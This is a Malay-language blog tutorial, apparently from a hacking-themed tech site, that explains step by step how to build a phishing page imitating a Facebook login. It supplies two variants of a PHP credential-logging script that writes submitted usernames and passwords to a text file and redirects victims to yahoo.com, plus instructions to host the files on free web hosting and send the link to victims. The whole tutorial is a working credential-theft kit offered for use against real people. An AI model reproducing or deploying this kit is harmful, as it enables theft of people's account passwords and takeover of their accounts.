Kaedah Membuat Phisher Secara Manual

Artikel

Salam semua..untuk tajuk kali ini, bagi mereka yang tidak tahu apa itu phisher, secara ringkasnya ia adalah Fake Login Page atau halaman log masuk palsu yang dibuat untuk mendapatkan kata laluan dari para pengguna, contohnya Facebook, akaun emel dan lain-lain. Entry hari ini akan menerangkan kaedah membuat phisher/fake login page secara manual untuk kesemua laman web yang anda ingini.

1. Pertama sekali buka laman web yang anda ingin untuk membuat phisher, klik kanan pada ruang kosong dan pilih ‘view source‘. Salin kesemuanya ke dalam notepad dan save sebagai namayangandasuka.html

contoh untuk tutorial ini: Facebook.html

2. Kemudian, buka Facebook.html tadi dengan notepad dan kemudian cari (ctrl+f) string ‘action = https..‘. Tukarkan alamat tersebut kepada login.php dan save.

3. Setelah itu kita perlu mencipta login.php. Untuk itu buka notepad, salin kod berikut dan save sebagai login.php

<?php
header (‘Location: http://yahoo.com’);
$handle = fopen(“log.txt”, “a”);
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “rn”);
}
fwrite($handle, “rn”);
fclose($handle);
exit;
?>

Dapat dilihat disitu, sekiranya mangsa login, mereka akan diarahkan ke yahoo.com
sekiranya anda ingin mereka diarahkan ke alamat yang lain, anda hanya perlu menukar alamat http://yahoo.com itu.
Jika terdapat masalah pada code login.php ini, sila cuba code alternatif dibawah dan gantikan http://WEBSITE dengan alamat URL yang anda mahu :

header(“Location: http://WEBSITE “);
$handle =


fopen(“pass.txt”, “a”);
foreach($_GET as


$variable => $value) {
fwrite($handle,


$variable);
fwrite($handle, “=”);


fwrite($handle, $value);
fwrite($handle,


“rn”);
}
fwrite($handle, “rn”);
fclose($handle);
exit;

4. Kemudian kita perlu mencipta fail log yang kosong (tempat penyimpanan kata laluan) dan untuk ini buka notepad, tidak perlu taip apa-apa, terus save sebagai log.txt

5. Buka satu akaun di laman web hosting percuma seperti T35.com atau 000Webhost.com

6. Muat naik ketiga-tiga fail tadi iaitu Facebook.html, login.php, log.txt ke dalam akaun web hosting yang telah dibuat dan ubah permissions bagi fail log.txt kepada 777

7. Untuk menggunakannya, hantar pautan (link) Facebook.html kepada mangsa dan setiap kali mereka log masuk melalui pautan itu, mereka akan diarahkan ke yahoo.com dan kata laluan (password) serta nama pengguna (username) akan dihantar ke fail log.txt. Anda boleh membuka log.txt untuk melihat kata laluan dan nama pengguna tersebut.

Arya Putra
Arya Putrahttps://omghackers.com/
A regular tech blogger who have passions for cats. I will not put my trust on anybody who hated them, doesn't matter if they are my friends or family. I have a dream where I am the owner of a Cat Cafe. Help me achieve it by hiring me as your reviewer. For any review inquiries, you can contact me at [email protected]

Artikel Terkini

spot_imgspot_img
Previous article
Kaedah Melepasi Sekatan Websense
Next article
Senarai 10 Web Browser Yang Jarang Didengari

Artikel Berkaitan

spot_imgspot_img

Artikel Popular

Pilihan OMG

Surat berita

Langgan untuk mengikuti berita, tutorial, dan perkongsian terbaru dari kami. Ia percuma. Data anda tidak akan dikongsi keluar apatah lagi dijual. Jangan risau. Kami orang baik-baik.

Dengan melanggan, anda menerima untuk mendapatkan post terbaru omghackers.com terus ke emel anda.

© Hakcipta Terpelihara - OMG! Hackers? Media 2022